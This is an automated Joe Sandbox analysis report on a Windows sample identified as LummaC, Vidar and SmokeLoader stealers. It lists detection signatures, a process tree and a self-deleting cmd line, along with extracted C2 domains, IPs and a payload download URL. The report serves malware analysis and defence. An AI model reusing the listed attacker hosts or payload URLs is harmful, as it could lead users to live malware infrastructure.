Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2.exe

Overview

General Information

Sample name:2.exe
Analysis ID:1447652
MD5:4d956ba3709b6be0cc4910690ef93f0b
SHA1:699a84b4e11844653e1d0cf90d9efda870d737fd
SHA256:91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993
Tags:exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\2.exe" MD5: 4D956BA3709B6BE0CC4910690EF93F0B)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 38F9.exe (PID: 7932 cmdline: C:\Users\user\AppData\Local\Temp\38F9.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7932 -s 1512 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • D818.exe (PID: 7224 cmdline: C:\Users\user\AppData\Local\Temp\D818.exe MD5: AC1CC39DC3DF2AB7197EC22259A09E17)
        • katB4C0.tmp (PID: 4480 cmdline: C:\Users\user\AppData\Local\Temp\katB4C0.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katB4C0.tmp" & rd /s /q "C:\ProgramData\FIEGCBKEGCFC" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7832 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • jssrvvh (PID: 7868 cmdline: C:\Users\user\AppData\Roaming\jssrvvh MD5: 4D956BA3709B6BE0CC4910690EF93F0B)
  • jssrvvh (PID: 6468 cmdline: C:\Users\user\AppData\Roaming\jssrvvh MD5: 4D956BA3709B6BE0CC4910690EF93F0B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop"], "Build id": "swg5EG--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
        00000010.00000002.3994207435.0000000002D70000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000005.00000002.1969684642.0000000002E4B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x6b0a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x7072:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 33 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.D818.exe.4570000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            10.2.D818.exe.4570000.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
            • 0x221f0:$s1: JohnDoe
            • 0x221e8:$s2: HAL9TH
            10.2.D818.exe.2560000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              10.2.D818.exe.2560000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x20df0:$s1: JohnDoe
              • 0x20de8:$s2: HAL9TH
              10.2.D818.exe.4347719.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Click to see the 7 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jssrvvh, CommandLine: C:\Users\user\AppData\Roaming\jssrvvh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jssrvvh, NewProcessName: C:\Users\user\AppData\Roaming\jssrvvh, OriginalFileName: C:\Users\user\AppData\Roaming\jssrvvh, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\jssrvvh, ProcessId: 7868, ProcessName: jssrvvh

                Snort Signatures

                Timestamp:05/26/24-10:28:23.404116
                SID:2039103
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:26.528096
                SID:2039103
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:31.624034
                SID:2039103
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:30.628218
                SID:2039103
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:55.119711
                SID:2039103
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:22.363903
                SID:2039103
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:30.181811
                SID:2052787
                Source Port:55411
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:56.160957
                SID:2039103
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:21.316978
                SID:2039103
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:24.455656
                SID:2039103
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:29.589480
                SID:2039103
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:32.680599
                SID:2039103
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:28:25.535669
                SID:2039103
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 2.exeAvira: detected
                Antivirus detection for URL or domain
                Source: whispedwoodmoodsksl.shopAvira URL Cloud: Label: malware
                Source: https://whispedwoodmoodsksl.shop/apicCAvira URL Cloud: Label: malware
                Source: http://45.129.96.86/file/update.exeAvira URL Cloud: Label: malware
                Source: https://whispedwoodmoodsksl.shop/yAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeAvira: detection malicious, Label: TR/AVI.AceCrypter.javlp
                Source: C:\Users\user\AppData\Roaming\jssrvvhAvira: detection malicious, Label: HEUR/AGEN.1311176
                Found malware configuration
                Source: 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
                Source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
                Source: 38F9.exe.7932.6.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop"], "Build id": "swg5EG--"}
                Multi AV Scanner detection for domain / URL
                Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                Source: dbfhns.inVirustotal: Detection: 5%Perma Link
                Source: https://65.109.242.59/ZVirustotal: Detection: 13%Perma Link
                Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                Source: http://guteyr.cc/tmp/index.phpVirustotal: Detection: 12%Perma Link
                Source: https://65.109.242.59/sVirustotal: Detection: 13%Perma Link
                Source: https://65.109.242.59/qVirustotal: Detection: 13%Perma Link
                Source: https://65.109.242.59/MVirustotal: Detection: 6%Perma Link
                Source: https://65.109.242.59/(Virustotal: Detection: 12%Perma Link
                Source: http://45.129.96.86/file/update.exeVirustotal: Detection: 20%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeReversingLabs: Detection: 95%
                Source: C:\Users\user\AppData\Roaming\jssrvvhReversingLabs: Detection: 39%
                Multi AV Scanner detection for submitted file
                Source: 2.exeReversingLabs: Detection: 39%
                Source: 2.exeVirustotal: Detection: 43%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\jssrvvhJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\D818.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 2.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0041537E CryptUnprotectData,6_2_0041537E
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB5A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,11_2_6CB5A9A0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB544C0 PK11_PubEncrypt,11_2_6CB544C0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB24420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,11_2_6CB24420
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB54440 PK11_PrivDecrypt,11_2_6CB54440
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBA25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,11_2_6CBA25B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,11_2_6CB3E6E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB38670 PK11_ExportEncryptedPrivKeyInfo,11_2_6CB38670
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB5A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,11_2_6CB5A650
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,11_2_6CB7A730
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB80180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,11_2_6CB80180
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB543B0 PK11_PubEncryptPKCS1,PR_SetError,11_2_6CB543B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB77C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,11_2_6CB77C00
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,11_2_6CB7BD30
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB37D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,11_2_6CB37D60
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB79EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,11_2_6CB79EC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB53FF0 PK11_PrivDecryptPKCS1,11_2_6CB53FF0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB53850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,11_2_6CB53850
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB59840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,11_2_6CB59840
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7DA40 SEC_PKCS7ContentIsEncrypted,11_2_6CB7DA40

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeUnpacked PE file: 6.2.38F9.exe.400000.0.unpack
                Source: 2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49768 version: TLS 1.2
                Source: Binary string: mozglue.pdbP source: katB4C0.tmp, 0000000B.00000002.2822044307.000000006D0CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.11.dr
                Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr
                Source: Binary string: nss3.pdb@ source: katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
                Source: Binary string: nss3.pdb source: katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: mozglue.pdb source: katB4C0.tmp, 0000000B.00000002.2822044307.000000006D0CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.11.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.dr
                Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]6_2_00427353
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]6_2_00427353
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov word ptr [eax], cx6_2_004168EF
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_00409960
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_00409960
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]6_2_00404970
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]6_2_00415FE1
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then dec edx6_2_0043B050
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h6_2_00417062
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]6_2_00417062
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00426174
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]6_2_004381BB
